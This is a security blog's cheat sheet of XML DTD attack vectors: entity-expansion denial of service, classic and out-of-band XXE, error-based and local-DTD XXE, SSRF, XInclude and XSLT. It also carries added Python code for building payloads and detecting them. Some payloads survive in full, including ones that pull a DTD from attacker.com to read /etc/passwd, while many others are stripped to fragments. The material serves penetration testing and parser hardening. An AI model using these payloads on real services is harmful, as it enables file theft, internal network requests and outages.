Wednesday, 2 March 2016

DTD Cheat Sheet

When evaluating the security of XML based services, one should always consider DTD based attack vectors such as XML External Entities (XXE), as, for example, our previous post XXE in SAML Interfaces demonstrates.

In this post we provide a comprehensive list of different DTD attacks.

The attacks are categorized as follows: Denial-of-Service attacks, classic XXE, evolved XXE attacks with a direct feedback channel, evolved XXE attacks over out-of-band channels, SSRF attacks, XInclude attacks and XSLT attacks.
You can also check out our large-scale parser evaluation against DTD attacks.

Last updated on 16 January 2019.
Please contact us if you have any missing vectors!

Denial-of-Service Attacks

Testing for Entity Support






]>
&a2;

If this test is successful and the parsing process is slowed down, there is a high probability that your parser is configured insecurely and is vulnerable to at least one kind of DoS.

 

Billion Laughs Attack (Klein, 2002)







]>
&a4;

This file expands to only about 30 KByte, but resolving it takes a total of 11111 entity references and therefore exceeds any reasonable threshold of entity references.
Source

Billion Laughs Attack - Parameter Entities (Späth, 2015)



]>
&g;

File stored on http://publicServer.com/dos.dtd




%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;">
%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;">
%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;">

Quadratic Blowup Attack



]>
&a0;&a0;...&a0;

Source

Recursive General Entities

This vector is not well-formed according to [WFC: No Recursion]; a conforming parser must report the cycle instead of looping, so the test shows whether the parser enforces that constraint.




]>
&a;
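As an added example (not part of the original cheat sheet), the following Python script builds the three entity-expansion payloads of this section, Billion Laughs, Quadratic Blowup and the recursive pair, and statically estimates what a parser would have to expand. That estimate is the check a hardened endpoint can run before handing a document to the real parser, and it costs only linear time in the size of the declarations. The function names, the "dos" atom and the limits in is_suspicious are assumptions made here, not values taken from the original payload files or from any particular parser.

```python
import re

# Internal general entity declarations, e.g. <!ENTITY a1 "&a0;&a0;">.
# Parameter entities (<!ENTITY % ...>) and external entities (SYSTEM/PUBLIC)
# are deliberately not matched: their size cannot be determined locally.
_ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(?!%)([^\s"\'>]+)\s+(?:"([^"]*)"|\'([^\']*)\')\s*>')
_ENTITY_REF = re.compile(r'&([^\s&;<]+);')
_PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}   # each expands to 1 char


class RecursiveEntityError(ValueError):
    """An entity references itself, directly or via other entities
    (violates WFC: No Recursion)."""


def parse_internal_entities(doc):
    """Return {name: literal value} for the general entities declared in
    the internal DTD subset of `doc` (the part up to ']>')."""
    start = doc.find("<!DOCTYPE")
    if start < 0:
        return {}
    end = doc.find("]>", start)
    subset = doc[start:end] if end >= 0 else doc[start:]
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _ENTITY_DECL.finditer(subset)}


def _cost(stats, name):
    """(expanded length, nested references) for a reference to `name`."""
    if name in stats:
        return stats[name]
    if name in _PREDEFINED:
        return (1, 0)
    return (0, 0)                      # undeclared or external: unknown size


def expansion_stats(entities):
    """For every declared entity compute (expanded length, number of entity
    references resolved during expansion) WITHOUT building the expanded
    text, so the estimator itself cannot be blown up."""
    stats, in_progress = {}, set()

    def visit(name):
        if name in stats:
            return stats[name]
        if name in in_progress:
            raise RecursiveEntityError(f"entity '{name}' is recursive")
        in_progress.add(name)
        value = entities[name]
        length = refs = last = 0
        for m in _ENTITY_REF.finditer(value):
            length += m.start() - last            # literal text before the ref
            last = m.end()
            ref = m.group(1)
            sub_len, sub_refs = visit(ref) if ref in entities else _cost(stats, ref)
            length += sub_len
            refs += 1 + sub_refs                  # this reference + nested ones
        length += len(value) - last
        in_progress.discard(name)
        stats[name] = (length, refs)
        return stats[name]

    for name in entities:
        visit(name)
    return stats


def document_expansion(doc):
    """(expanded length, references resolved) for the references in the
    document body, i.e. what the parser would produce for the content."""
    stats = expansion_stats(parse_internal_entities(doc))
    end = doc.find("]>")
    body = doc[end + 2:] if end >= 0 else doc
    length = refs = 0
    for m in _ENTITY_REF.finditer(body):
        sub_len, sub_refs = _cost(stats, m.group(1))
        length += sub_len
        refs += 1 + sub_refs
    return length, refs


def is_suspicious(doc, max_expansion=1_000_000, max_refs=10_000, max_ratio=100):
    """Pre-parse check. The limits are illustrative assumptions: a cap on
    expanded bytes, a cap on entity references, and an amplification ratio
    (expanded size / raw document size)."""
    try:
        length, refs = document_expansion(doc)
    except RecursiveEntityError:
        return True
    return (length > max_expansion or refs > max_refs
            or length > max_ratio * max(len(doc), 1))


def billion_laughs(depth=4, fanout=10, atom="dos"):
    """Nested entities: a0 = atom, a(i) = `fanout` references to a(i-1),
    body references a(depth) once. Defaults give the 11111-reference file."""
    decls = [f'<!ENTITY a0 "{atom}">']
    for i in range(1, depth + 1):
        refs = f"&a{i - 1};" * fanout
        decls.append(f'<!ENTITY a{i} "{refs}">')
    return ('<?xml version="1.0"?>\n<!DOCTYPE data [\n' + "\n".join(decls)
            + f'\n]>\n<data>&a{depth};</data>')


def quadratic_blowup(atom_len=50_000, refs=50_000):
    """One large entity referenced many times: no nesting, so a depth
    limit alone does not stop it, but the size and ratio caps do."""
    return ('<?xml version="1.0"?>\n<!DOCTYPE data [\n'
            f'<!ENTITY a0 "{"A" * atom_len}">\n]>\n'
            f'<data>{"&a0;" * refs}</data>')


def recursive_entities():
    """Not well-formed (WFC: No Recursion); a conforming parser rejects it."""
    return ('<?xml version="1.0"?>\n<!DOCTYPE data [\n'
            '<!ENTITY a "&b;">\n<!ENTITY b "&a;">\n]>\n<data>&a;</data>')
```

document_expansion(billion_laughs()) yields (30000, 11111), the figures quoted above for the Billion Laughs file; the quadratic payload has only 50000 references but an expansion of 2.5 GByte, which is why a reference limit alone is not sufficient.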

External General Entities (Steuck, 2002)

The idea of this attack is to declare an external general entity that references a large file on a network resource or locally (e.g. C:/pagefile.sys or /dev/random).
However, a DoS of this kind only works if the parser actually resolves the external entity and consumes the referenced content; in effect it makes the parser process a very large XML document.




]>
&dos;

Source

Classic XXE

Classic XXE Attack (Steuck, 2002)





]>
&file;

We use the file '/sys/power/image_size' as an example, because it is a very simple file (one line, no special characters).

This attack requires a direct feedback channel, and reading out files is limited by characters that are forbidden in XML content, such as "<" and "&".
If such characters occur in the accessed file (e.g. /etc/fstab), the XML parser raises an exception and stops parsing the message, so nothing is returned.

Source
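As an added example (not from the original post), here is the classic XXE vector run against Python's stdlib SAX parser, which is expat underneath: the same payload is parsed once with external general entities enabled (the insecure configuration) and once with the default, which has been off since Python 3.7.1. A constructed stand-in for /etc/fstab shows the forbidden-character limitation described above. The helper names, the temporary file and the sample contents are assumptions of this example.

```python
import io
import os
import tempfile
import xml.sax
from pathlib import Path
from xml.sax.handler import feature_external_ges


class _TextCollector(xml.sax.ContentHandler):
    """Collects character data so we can inspect what the parser emitted."""
    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_text(xml_bytes, resolve_external=False):
    """Parse with the stdlib (expat-based) SAX reader and return the text
    content. resolve_external=True switches on feature_external_ges, the
    insecure setting; the stdlib default is False."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


def classic_xxe_payload(target_uri):
    """The classic XXE document: an external general entity pointing at
    target_uri, referenced from the body so the file content comes back in
    the parser's output (direct feedback channel)."""
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE data [\n"
        "<!ELEMENT data (#PCDATA)>\n"
        f'<!ENTITY file SYSTEM "{target_uri}">\n'
        "]>\n"
        "<data>&file;</data>\n"
    ).encode("latin-1")


def read_via_xxe(file_content, resolve_external):
    """Write `file_content` (constructed sample data) to a temporary file,
    aim the payload at it and return the text the parser produced, or None
    if the parser rejected the document."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(file_content)
        path = f.name
    try:
        payload = classic_xxe_payload(Path(path).as_uri())
        return parse_text(payload, resolve_external)
    except xml.sax.SAXParseException:
        return None
    finally:
        os.unlink(path)


# Constructed stand-in for /sys/power/image_size: one line, no special characters.
SIMPLE_FILE = "4096\n"
# Constructed stand-in for /etc/fstab: contains '<', which is not allowed in
# an external parsed entity at that position, so the parse fails.
FILE_WITH_MARKUP = "# <file system> <mount point> <type> <options>\n"

if __name__ == "__main__":
    print("vulnerable :", repr(read_via_xxe(SIMPLE_FILE, True)))   # file content leaks
    print("hardened   :", repr(read_via_xxe(SIMPLE_FILE, False)))  # entity not resolved
    print("forbidden  :", read_via_xxe(FILE_WITH_MARKUP, True))    # None: parse error
```

The hardened run returns no file content because, with feature_external_ges off, expat is given no external entity handler and the reference is skipped; the third run is the limitation from the text, a file containing "<" or "&" in the wrong place makes the parser fail instead of leaking.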

XXE Attack using netdoc





]>
&file;

Source: @Nirgoldshlager

XXE Attack using UTF-16 (Dawid Golunski)

Some simple blacklisting countermeasures can probably be bypassed by changing the default XML charset (UTF-8) to a different one, for example UTF-16:

<?xml version="1.0" encoding="UTF-16"?>



]>
&file;

The above file can simply be created with a text editor.
To convert it to UTF-16, you can use the Linux tool iconv:

# cat file.xml | iconv -f UTF-8 -t UTF-16 > file_utf16.xml

Source, Thanks to @ilmila

XXE Attack using UTF-7

The same trick can be applied to UTF-7 as well.

<?xml version="1.0" encoding="UTF-7" ?>



]>
&file;

# cat file.xml | iconv -f UTF-8 -t UTF-7 > file_utf7.xml

Source, Thanks to @ilmila
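Added example (not part of the original page): a byte-level blacklist for DOCTYPE/ENTITY next to an encoding-aware check, exercised with the classic XXE document re-encoded as UTF-16 (what the iconv command above produces) and as fully base64-encoded UTF-7. The UTF-7 bytes are built by hand because Python's own utf-7 codec leaves '<' and '!' unencoded and would therefore not fool the blacklist; whether the re-encoded document is afterwards actually parsed depends on the target parser accepting that encoding. The function names and the transport_charset parameter (standing in for an HTTP Content-Type charset) are assumptions of this example.

```python
import base64
import codecs
import re

# Constructed sample: the classic XXE document from this cheat sheet.
XXE_DOC = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE data [\n"
    '<!ENTITY file SYSTEM "file:///etc/passwd">\n'
    "]>\n"
    "<data>&file;</data>\n"
)

_DTD_MARKERS = re.compile(r"<!DOCTYPE\b|<!ENTITY\b", re.IGNORECASE)
_XML_DECL_ENCODING = re.compile(rb"<\?xml[^>]*?encoding=[\"']([A-Za-z0-9._-]+)[\"']")


def naive_blacklist(raw):
    """A byte-level filter that silently assumes UTF-8/ASCII input.
    Returns True when it believes the document carries a DTD."""
    upper = raw.upper()
    return b"<!DOCTYPE" in upper or b"<!ENTITY" in upper


def sniff_encoding(raw, transport_charset=None):
    """Determine the encoding the XML parser will use: an out-of-band charset
    (e.g. from HTTP Content-Type) wins, then the BOM / first bytes as in
    XML 1.0 Appendix F, then the encoding pseudo-attribute, else UTF-8."""
    if transport_charset:
        return transport_charset
    if raw.startswith(codecs.BOM_UTF8):
        return "utf-8-sig"
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return "utf-16"                       # the codec consumes the BOM
    if raw.startswith(b"<\x00?\x00"):
        return "utf-16-le"
    if raw.startswith(b"\x00<\x00?"):
        return "utf-16-be"
    m = _XML_DECL_ENCODING.match(raw)
    return m.group(1).decode("ascii") if m else "utf-8"


def has_dtd(raw, transport_charset=None):
    """Encoding-aware check: decode the way the parser would, then look for a
    DOCTYPE or entity declaration in the decoded text. An encoding Python
    does not know is treated as suspicious rather than ignored."""
    try:
        text = raw.decode(sniff_encoding(raw, transport_charset), errors="replace")
    except LookupError:
        return True
    return _DTD_MARKERS.search(text) is not None


def to_utf16(doc):
    """Equivalent of `iconv -f UTF-8 -t UTF-16` on a document whose
    declaration says UTF-16: BOM followed by UTF-16 code units."""
    declared = doc.replace('version="1.0"', 'version="1.0" encoding="UTF-16"', 1)
    return declared.encode("utf-16")


def to_utf7(doc):
    """RFC 2152 UTF-7 with the whole document in one base64 shift sequence
    (modified base64 of the UTF-16BE form, padding stripped)."""
    declared = doc.replace('version="1.0"', 'version="1.0" encoding="UTF-7"', 1)
    b64 = base64.b64encode(declared.encode("utf-16-be")).decode("ascii").rstrip("=")
    return b"+" + b64.encode("ascii") + b"-"
```

The UTF-7 document starts with "+" rather than "<?xml", so neither the check nor a parser can discover the encoding from the bytes alone; it only works where the charset arrives out of band, which is why has_dtd accepts a transport_charset. The lesson is the same for any blacklist: decode first, match second, or better, reject every DOCTYPE at the parser.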

Evolved XXE Attacks - Direct Feedback Channel

This class of attack vectors is called evolved XXE attacks and is used (i) to bypass restrictions of classic XXE attacks and (ii) for out-of-band attacks.

Bypassing Restrictions of XXE (Morgan, 2014)







">

%dtd;
]>
&all;

File stored on http://publicServer.com/parameterEntity_core.dtd

 
Source

Bypassing Restrictions of XXE (Späth, 2015)



&all;

File stored on http://publicServer.com/parameterEntity_doctype.dtd




">

XXE by abusing Attribute Values (Yunusov, 2013)

This vector bypasses [WFC: No External Entity References].





%remote;
]>

File stored on http://publicServer.com/external_entity_attribute.dtd


">
%param1;

Source

Error-based XXE using Parameter Entities (Arseniy Sharoglazov, 2018)


<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
    %ext;
]>


File stored on http://attacker.com/ext.dtd


<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

The parser tries to open file:///nonexistent/<contents of /etc/passwd>; many implementations echo the resolved URI, and thus the file content, in their error message, which turns the error output into the feedback channel.


Abusing local-DTD Files XXE (Arseniy Sharoglazov, 2018)

If the parser does not fetch external DTDs over the network, one can instead reference a DTD file that already exists on the target system. Parameter entity references inside markup declarations are only permitted in an external subset, so the trick is to redefine a parameter entity that the local DTD uses and let the local DTD expand it:


<?xml version="1.0" ?>
<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">

    <!ENTITY % condition 'aaa)>
        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
        <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
        &#x25;eval;
        &#x25;error;
        <!ELEMENT aa (bb'>

    %local_dtd;
]>
<message>any text</message>

Contents of sip-app_1_0.dtd

<!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of">
<!ELEMENT pattern (%condition;)>

Source (also providing a list of local DTD files)

Evolved XXE Attacks - Out-of-Band channels

Just because there is no direct feedback channel available does not imply that an XXE attack is not possible.

XXE OOB Attack (Yunusov, 2013)



&send;

File stored on http://publicServer.com/parameterEntity_oob.dtd


">
%all;

Source



XXE OOB Attack - Parameter Entities (Yunusov, 2013)

Here is a variation of the previous attack using only parameter entities.




%remote;
%send;
]>
4

File stored on http://publicServer.com/parameterEntity_sendhttp.dtd


">
%param1;

Source

XXE OOB Attack - Parameter Entities FTP (Novikov, 2014)

Using the FTP protocol, an attacker can read out files of arbitrary length (unlike HTTP, where newlines and length limits in the URL truncate the exfiltrated data).




%remote;
%send;
]>
4

File stored on http://publicServer.com/parameterEntity_sendftp.dtd



">
%param1;

This attack requires setting up a modified FTP server. Adjustments to the PoC code will probably be necessary to apply it to an arbitrary parser.

Source

SchemaEntity Attack (Späth, 2015)

We identified three variations of this attack using (i) schemaLocation, (ii) noNamespaceSchemaLocation and (iii) XInclude.

schemaLocation




%remote;
]>

 xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="ttt http://publicServer.com/&internal;">4

noNamespaceSchemaLocation




%remote;
]>

    xsi:noNamespaceSchemaLocation="http://publicServer.com/&internal;">

XInclude




%remote;
]>


File stored on http://publicServer.com/external_entity_attribute.dtd


">
%param1;

 

SSRF Attacks

DOCTYPE




]>
4

External General Entity (Steuck, 2002)





]>
&remote;

Referencing a well-formed XML file (or any text file, for that matter) avoids a parsing error, but some parsers request the URL regardless, so the SSRF succeeds even when the referenced resource is not well-formed.

Source

External Parameter Entity (Yunusov, 2013)





%remote;
]>
4

File stored on http://publicServer.com/url_invocation_parameterEntity.dtd


Source

XInclude



File stored on http://publicServer.com/file.xml


it_works

schemaLocation



 xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="http://publicServer.com/url_invocation_schemaLocation.xsd">4

File stored on http://publicServer.com/url_invocation_schemaLocation.xsd


<>
     xmlns:xs="http://www.w3.org/2001/XMLSchema">
 

or use this file


<>
     xmlns:xs="http://www.w3.org/2001/XMLSchema"
targetNamespace="http://test.com/attack">
 

noNamespaceSchemaLocation




xsi:noNamespaceSchemaLocation="http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd">4

File stored on http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd



<>
     xmlns:xs="http://www.w3.org/2001/XMLSchema">
 

XXE on JSON Webservices Trick (Antti Rantasaari)

If you pentest a web service that supports JSON, you can try to force it to parse XML as well.
The example is copied from this blog post by Antti Rantasaari.

Given HTTP example request:



POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}


It can be converted to enforce XML processing by setting the HTTP Content-Type to application/xml:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288


]>

name
&xxe;

In this case, the JSON keys "search" and "value" are converted to XML elements <search> and <value>, so that the document still carries the same parameters the JSON format did.
A root element was added around them to get a valid XML document (since an XML document must have exactly one root element).

The XXE attack might also work by simply adding one of the other attack vectors of this post.

 XInclude Attacks (Morgan, 2014)


Source

XSLT Attacks


   
       
   



Authors of this Post

Christopher Späth 
Christian Mainka (@CheariX)
Vladislav Mladenov 
